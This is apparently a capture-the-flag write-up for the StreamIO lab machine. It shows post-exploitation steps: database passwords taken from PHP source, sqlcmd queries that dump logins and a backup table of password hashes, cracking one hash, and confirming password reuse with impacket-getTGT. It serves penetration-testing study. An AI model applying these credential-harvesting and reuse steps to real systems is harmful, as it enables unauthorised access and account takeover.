MSSQL
During the SQL injection analysis earlier, it became evident that an MSSQL server was present, hosting 2 none default databases. However, interaction with one of these databases proved challenging as there was no response.
The MSSQL instance, discussed in the MSSQL instance section, was found to be actively running on the default port 1433. Furthermore, detailed information about its installation was successfully confirmed.
This discovery opens avenues for further investigation, as the existence of non-default databases and the potential difficulty in interacting with one of them raise questions about the underlying data structure, access controls, and overall database security.
looking further into the web root directory, the provided code block above reveals sql connection strings embedded in the php source code of two distinct files: watch.streamio.htb\search.php and streamio.htb\admin\index.php. These connection strings are crucial for establishing a link between the web application and the corresponding Microsoft SQL Server (MSSQL) database.
ps c:\inetpub> cat watch.streamio.htb\search.php | findstr 'connection'
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);This credential was initially seen and was the authenticated account during the SQL injection
- database:
STREAMIO - user id:
db_user - password:
B1@hB1@hB1@hI was unable to enumerate thestreamio_backupDB with this credential
ps c:\inetpub> cat streamio.htb\admin\index.php | findstr 'connection'
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);This credential was initially found via file read operation through the PHP conversion filter earlier before even gain the foothold The credential here seems to be suggesting administrative-level privileges as the name suggests
- database:
STREAMIO - user id:
db_admin - password:
B1@hx31234567890
With these DB credentials at hand, the MSSQL instance can further be explored
sqlcmd
Much like the command line tool for MySQL, there is a command like line for MSSQL It’s sqlcmd and gets shipped with MSSQL by default
PS C:\inetpub\streamio.htb\admin> sqlcmd -?
Microsoft (R) SQL Server Command Line Tool
Version 15.0.2000.5 NT
Copyright (C) 2019 Microsoft Corporation. All rights reserved.
usage: Sqlcmd [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-N Encrypt Connection][-C Trust Server Certificate]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w screen width]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-c cmdend] [-L[c] list servers[clean output]]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-m errorlevel] [-V severitylevel] [-W remove trailing spaces]
[-u unicode output] [-r[0|1] msgs to stderr]
[-i inputfile] [-o outputfile] [-z new password]
[-f <codepage> | i:<codepage>[,o:<codepage>]] [-Z new password and exit]
[-k[1|2] remove[replace] control characters]
[-y variable length type display width]
[-Y fixed length type display width]
[-p[1] print statistics[colon format]]
[-R use client regional setting]
[-K application intent]
[-M multisubnet failover]
[-b On error batch abort]
[-v var = "value"...] [-A dedicated admin connection]
[-X[1] disable commands, startup script, environment variables [and exit]]
[-x disable variable substitution]
[-j Print raw error messages]
[-g enable column encryption]
[-G use Azure Active Directory for authentication]
[-? show syntax summary]There it is. I’ll start by checking the users
Users
ps c:\inetpub\streamio.htb\admin> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q 'SELECT name FROM master..syslogins'
name
--------------------------------------------------------------------------------------------------------------------------------
sa
##MS_SQLResourceSigningCertificate##
##MS_SQLReplicationSigningCertificate##
##MS_SQLAuthenticatorCertificate##
##MS_PolicySigningCertificate##
##MS_SmoExtendedSigningCertificate##
##MS_PolicyEventProcessingLogin##
##MS_PolicyTsqlExecutionLogin##
##MS_AgentSigningCertificate##
BUILTIN\Administrators
NT SERVICE\SQLWriter
NT SERVICE\Winmgmt
NT Service\MSSQLSERVER
streamIO\Administrator
BUILTIN\Users
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY
db_user
db_admin
(19 rows affected)Much different result compared to the earlier SQLi
streamio_backup DB
PS C:\inetpub\streamio.htb\admin> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q 'SELECT name FROM master..sysdatabases;;'
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
STREAMIO
streamio_backup
(6 rows affected)Same result.
The streamio_backup DB hasn’t been enumerated
PS C:\inetpub\streamio.htb\admin> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q "SELECT table_name FROM streamio_backup.information_schema.tables;"
table_name
--------------------------------------------------------------------------------------------------------------------------------
movies
users
(2 rows affected)While the streamio_backup DB contains the very same tables that the STREAMIO DB has, content may be different
I will check the users table
streamio_backup.users Table
ps c:\inetpub> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q "SELECT * FROM streamio_backup.dbo.users;"
-P 'B1@hx31234567890' -Q "SELECT * FROM streamio_backup.dbo.users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)The content is indeed different as there is a credential for the nikk37 user, who is also a valid domain user
I will grab those hashes and get cracking
Password Cracking
Running those hashes through crackstation.net revealed a new cracked password; get_dem_girls2@yahoo.com
The rest seems to be the same as the ones that cracked from the SQLi earlier; webcreds.txt
I will check for password reuse by attempting to authenticate the credential of the nikk37 user
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ impacket-getTGT streamio.htb/nikk37@dc.streamio.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: get_dem_girls2@yahoo.com
[*] Saving ticket in nikk37@dc.streamio.htb.ccacheValidated and password reuse confirmed
TGT created for the nikk37 user
Since the nikk37 user is part of the Remote Management Users group, I can WinRM directly into the target system
Moving on to the Lateral Movement phase